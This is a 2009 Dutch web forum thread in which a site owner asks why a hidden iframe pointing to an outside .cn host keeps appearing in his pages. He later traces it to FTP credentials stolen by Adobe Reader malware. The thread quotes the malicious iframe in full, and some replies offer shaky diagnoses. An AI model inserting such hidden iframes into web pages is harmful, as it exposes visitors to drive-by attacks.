login  Naam:   Wachtwoord: 
Registreer je!
 Forum

Broncode aangepast

Offline qubus - 08/06/2009 14:55
Avatar van qubusLid Hallo,

Ik heb diverse websites, waar de afgelopen dagen de broncode lijkt te worden aangepast. Ik heb er telkens opeens de volgende code in staan:

  1. <iframe src="http://nameshopinternational.cn:8080/index.php" width=141 height=110 style="visibility: hidden"></iframe>


Ik heb me rot gezocht, maar hoe is het mogelijk dat dit gebeurd? De sites staan op verschillende servers, de wachtwoorden heb ik van de week gewijzigd. Iemand een idee, zodat ik verder kan zoeken.
Alvast bedankt

7 antwoorden

Gesponsorde links
Offline ibmos2warp - 08/06/2009 14:59
Avatar van ibmos2warp PHP interesse Dan heb je een beveiligingsfout. Kan bijvoorbeeld ook door een include zijn gekomen, of door fputs of whatever.
Je bent nogal magertjes met je info.
Offline SvenP - 08/06/2009 15:06
Avatar van SvenP PHP interesse das een 1 of ander gaar virus, heeft mijn broer ook last van gehad, enige oplossing die hij had was hardeschijf formateren omdat alles aangetast werd, en om nou alles handmatig terug te zetten lijkt me niet erg leuk.
Offline Wim - 08/06/2009 15:09
Avatar van Wim Crew algemeen code van die pagina ziet er mij ook niet zo betrouwbaar uit. Als ik jou was zou ik eventjes contact opnemen met je webhost, want het is helemaal niet zeker of de fout wel bij u ligt
Offline larssy1 - 08/06/2009 19:07
Avatar van larssy1 MySQL beginner neem inderdaad contact op met uw webhost..

Dit probleem zit niet in UW systeem, tenzij u het zelf onwetend hebt geupload.

Ook is er een mogelijkheid dat hackers je site aanpassen. weet niet of dit alleen voor de tekst geld of ook voor de broncode. (ben de naam van deze hacker mogelijkheid vergete)
Offline ibmos2warp - 08/06/2009 19:10
Avatar van ibmos2warp PHP interesse
larssy1 schreef:
Dit probleem zit niet in UW systeem, tenzij u het zelf onwetend hebt geupload.

Nou dat weet ik niet zo hoor. Er zijn vaker fouten in de code dan in de beveiliging van de server.
Offline Koen - 08/06/2009 19:10
Avatar van Koen PHP expert
larssy1 schreef:
neem inderdaad contact op met uw webhost..

Dit probleem zit niet in UW systeem, tenzij u het zelf onwetend hebt geupload.

Ook is er een mogelijkheid dat hackers je site aanpassen. weet niet of dit alleen voor de tekst geld of ook voor de broncode. (ben de naam van deze hacker mogelijkheid vergete)

XSS Injection.
Offline qubus - 08/06/2009 22:36 (laatste wijziging 08/06/2009 22:39)
Avatar van qubus Lid Hallo,

Kom langzaam verder... het is een virus dat gebruik maakt van een beveiligingslek in Adobe Reader. Dit virus stuurt de FTP gegevens door, waardoor men kennelijk kan inloggen en de code kan aanpassen.

Kijk hier maar eens

Of hier...

Ik heb alle wachtwoorden nogmaals aangepast, nadat ik alle adobe software naar de nieuwste versies heb geupdate en het virus heb verwijderd. Hopelijk is dit het einde van de ellende.

Nooit geweten dat dit je kan overkomen, zonder er enige erg in te hebben, en zelfs zonder dat de virusscanner (F-secure) het oppikt.

Bedankt voor het meedenken.
Gesponsorde links
Dit onderwerp is gesloten.
Actieve forumberichten
© 2002-2024 Sitemasters.be - Regels - Laadtijd: 0.167s